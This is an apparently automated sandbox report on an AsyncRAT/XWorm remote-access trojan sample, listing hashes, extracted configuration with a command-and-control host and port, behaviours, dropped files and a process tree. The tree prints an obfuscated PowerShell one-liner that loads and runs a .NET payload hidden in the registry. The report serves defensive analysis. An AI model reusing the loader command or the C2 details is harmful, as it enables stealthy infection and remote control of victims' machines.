asyncrat | 3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211

Analysis

max time kernel
150s
max time network
17s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
30-07-2024 21:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe
Size

8.3MB
MD5

380ebda713b2e097ecebd5dc2a76bb52
SHA1

c4d558f574e8f6729018b69c60533b39dfd18e76
SHA256

3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211
SHA512

fc0d255ab7468139793fbc39e64e4811863f6fdc3c736086b645c484a20514f2c28b1225438dc6995ab033bec4791c42cc264db80994bdd9ee057394dc2234cc
SSDEEP

196608:c1+tQqVENtzdZ/HtNt4Z/OgVQa8z9fnE:cqqNtz7ft4Z/XV7kVE

Score

10^/10

asyncrat xworm mr.joex discovery evasion execution rat spyware stealer trojan upx

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Mr.Joex

seems-radio.gl.at.ply.gg:2519

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
true
install_file
Winhlp32.exe
install_folder
%Temp%

aes.plain

Extracted

Family

xworm

Version

3.1

seems-radio.gl.at.ply.gg:2519

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0009000000015b50-17.dat	family_xworm
behavioral1/memory/2664-85-0x0000000000EA0000-0x0000000000EBA000-memory.dmp	family_xworm

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP	svchost.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection	svchost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1540 created 420	1540	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0005000000010300-5.dat	family_asyncrat

Executes dropped EXE 28 IoCs

pid	Process
1744	x4svchost.exe
2680	x4host.exe
2664	x4Mr.Joex.exe
2696	x4Shellcode.exe
2556	x4host.exe
480	services.exe
1296	alg.exe
436	aspnet_state.exe
1900	mscorsvw.exe
3052	mscorsvw.exe
1776	elevation_service.exe
2364	GROOVE.EXE
2284	maintenanceservice.exe
2280	OSE.EXE
1196	Explorer.EXE
2860	mscorsvw.exe
2560	mscorsvw.exe
2100	mscorsvw.exe
2252	mscorsvw.exe
276	mscorsvw.exe
1304	mscorsvw.exe
2708	mscorsvw.exe
2648	mscorsvw.exe
2316	mscorsvw.exe
872	mscorsvw.exe
2344	mscorsvw.exe
852	mscorsvw.exe
2232	mscorsvw.exe

Loads dropped DLL 10 IoCs

pid	Process
3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe
2680	x4host.exe
2556	x4host.exe
2556	x4host.exe
2556	x4host.exe
2556	x4host.exe
2556	x4host.exe
2556	x4host.exe
2556	x4host.exe
480	services.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019620-112.dat	upx
behavioral1/memory/2556-140-0x000007FEF2BE0000-0x000007FEF31C9000-memory.dmp	upx

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1540	powershell.EXE

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\a81fd28962d4432.bin	alg.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	GROOVE.EXE
File opened for modification	C:\Windows\System32\alg.exe	x4Shellcode.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1540 set thread context of 940	1540	powershell.EXE	47

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\106.0.5249.119\chrome_installer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\apt.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jsadebugd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\native2ascii.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\tnameserv.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\template.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Oarpmany.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateOnDemand.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmiregistry.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javacpl.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\maintenanceservice.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleCrashHandler.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateSetup.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\javafxpackager.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\klist.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\serialver.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\kinit.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\plugin-container.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\MSInfo\msinfo32.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\java-rmi.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\servertool.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\SmartTagInstall.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Internet Explorer\ieinstal.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\chrmstp.exe	alg.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\vlc.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\orbd.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\javaw.exe	alg.exe
File opened for modification	C:\Program Files\Java\jre7\bin\unpack200.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.151\GoogleUpdateCore.exe	alg.exe
File opened for modification	C:\Program Files\7-Zip\7zFM.exe	alg.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\setup.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\default-browser-agent.exe	alg.exe
File opened for modification	C:\Program Files\7-Zip\7zG.exe	alg.exe
File opened for modification	C:\Program Files\Internet Explorer\iexplore.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\appletviewer.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\jarsigner.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\wsimport.exe	alg.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\xjc.exe	alg.exe
File opened for modification	C:\Program Files\Mozilla Firefox\uninstall\helper.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\reader_sl.exe	alg.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Updater.exe	alg.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen_service.log	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri1_lock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe	alg.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenservicelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngenservice_pri1_lock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenrootstorelock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe	alg.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngenofflinequeuelock.dat	mscorsvw.exe
File created	C:\Windows\Microsoft.NET\ngennicupdatelock.dat	mscorsvw.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe	x4Shellcode.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe	x4Shellcode.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe	alg.exe
File created	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngenofflinequeuelock.dat	mscorsvw.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OSE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	x4Shellcode.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GROOVE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mscorsvw.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	GROOVE.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30561c00c6e2da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1540	powershell.EXE
1540	powershell.EXE
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe
940	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2664	x4Mr.Joex.exe
Token: SeTakeOwnershipPrivilege	2696	x4Shellcode.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	1900	mscorsvw.exe
Token: SeDebugPrivilege	1540	powershell.EXE
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	1900	mscorsvw.exe
Token: SeDebugPrivilege	1540	powershell.EXE
Token: SeDebugPrivilege	940	dllhost.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	1900	mscorsvw.exe
Token: SeShutdownPrivilege	1900	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeAuditPrivilege	836	svchost.exe
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	1196	Explorer.EXE
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe
Token: SeShutdownPrivilege	3052	mscorsvw.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 1744	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	30
PID 3012 wrote to memory of 1744	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	30
PID 3012 wrote to memory of 1744	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	30
PID 3012 wrote to memory of 2680	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	31
PID 3012 wrote to memory of 2680	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	31
PID 3012 wrote to memory of 2680	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	31
PID 3012 wrote to memory of 2664	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	32
PID 3012 wrote to memory of 2664	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	32
PID 3012 wrote to memory of 2664	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	32
PID 3012 wrote to memory of 2696	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	33
PID 3012 wrote to memory of 2696	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	33
PID 3012 wrote to memory of 2696	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	33
PID 3012 wrote to memory of 2696	3012	3c2f5b524cb47ae11c54e65b48a8ae2898e88c737d8229b28513f0c15b940211.exe	33
PID 2680 wrote to memory of 2556	2680	x4host.exe	34
PID 2680 wrote to memory of 2556	2680	x4host.exe	34
PID 2680 wrote to memory of 2556	2680	x4host.exe	34
PID 352 wrote to memory of 1540	352	taskeng.exe	42
PID 352 wrote to memory of 1540	352	taskeng.exe	42
PID 352 wrote to memory of 1540	352	taskeng.exe	42
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 1540 wrote to memory of 940	1540	powershell.EXE	47
PID 940 wrote to memory of 420	940	dllhost.exe	5
PID 940 wrote to memory of 480	940	dllhost.exe	6
PID 940 wrote to memory of 488	940	dllhost.exe	7
PID 940 wrote to memory of 496	940	dllhost.exe	8
PID 940 wrote to memory of 592	940	dllhost.exe	9
PID 940 wrote to memory of 672	940	dllhost.exe	10
PID 940 wrote to memory of 748	940	dllhost.exe	11
PID 940 wrote to memory of 808	940	dllhost.exe	12
PID 940 wrote to memory of 836	940	dllhost.exe	13
PID 940 wrote to memory of 960	940	dllhost.exe	15
PID 940 wrote to memory of 112	940	dllhost.exe	16
PID 940 wrote to memory of 1008	940	dllhost.exe	17
PID 940 wrote to memory of 1056	940	dllhost.exe	18
PID 940 wrote to memory of 1100	940	dllhost.exe	19
PID 3052 wrote to memory of 2860	3052	mscorsvw.exe	48
PID 3052 wrote to memory of 2860	3052	mscorsvw.exe	48
PID 3052 wrote to memory of 2860	3052	mscorsvw.exe	48
PID 940 wrote to memory of 1172	940	dllhost.exe	20
PID 3052 wrote to memory of 2560	3052	mscorsvw.exe	49
PID 3052 wrote to memory of 2560	3052	mscorsvw.exe	49
PID 3052 wrote to memory of 2560	3052	mscorsvw.exe	49
PID 940 wrote to memory of 1196	940	dllhost.exe	21
PID 940 wrote to memory of 1260	940	dllhost.exe	23
PID 1900 wrote to memory of 2100	1900	mscorsvw.exe	50
PID 1900 wrote to memory of 2100	1900	mscorsvw.exe	50
PID 1900 wrote to memory of 2100	1900	mscorsvw.exe	50
PID 1900 wrote to memory of 2100	1900	mscorsvw.exe	50
PID 940 wrote to memory of 620	940	dllhost.exe	24
PID 1900 wrote to memory of 2252	1900	mscorsvw.exe	51
PID 1900 wrote to memory of 2252	1900	mscorsvw.exe	51
PID 1900 wrote to memory of 2252	1900	mscorsvw.exe	51
PID 1900 wrote to memory of 2252	1900	mscorsvw.exe	51
PID 940 wrote to memory of 1608	940	dllhost.exe	25
PID 1900 wrote to memory of 276	1900	mscorsvw.exe	52
PID 1900 wrote to memory of 276	1900	mscorsvw.exe	52
PID 1900 wrote to memory of 276	1900	mscorsvw.exe	52

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{b2cc0186-00d6-4076-b844-86aae237769b}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:940

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:592
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:620
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:1608
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
    3⤵
    PID:1792
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  - Modifies security service
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1172
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:836
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {D6F0A4DF-735B-4DCC-9BC1-7BDBAC8DF3CB} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+[Char](52)+''+[Char](115)+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1540
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:112
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1008
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1056
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1100
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1260
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:3056
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:1280
- C:\Windows\System32\alg.exe
  C:\Windows\System32\alg.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Drops file in Windows directory
  PID:1296
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
  2⤵
  - Executes dropped EXE
  PID:436
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 1d0 -NGENProcess 1d4 -Pipe 1e0 -Comment "NGen Worker Process"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2100
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
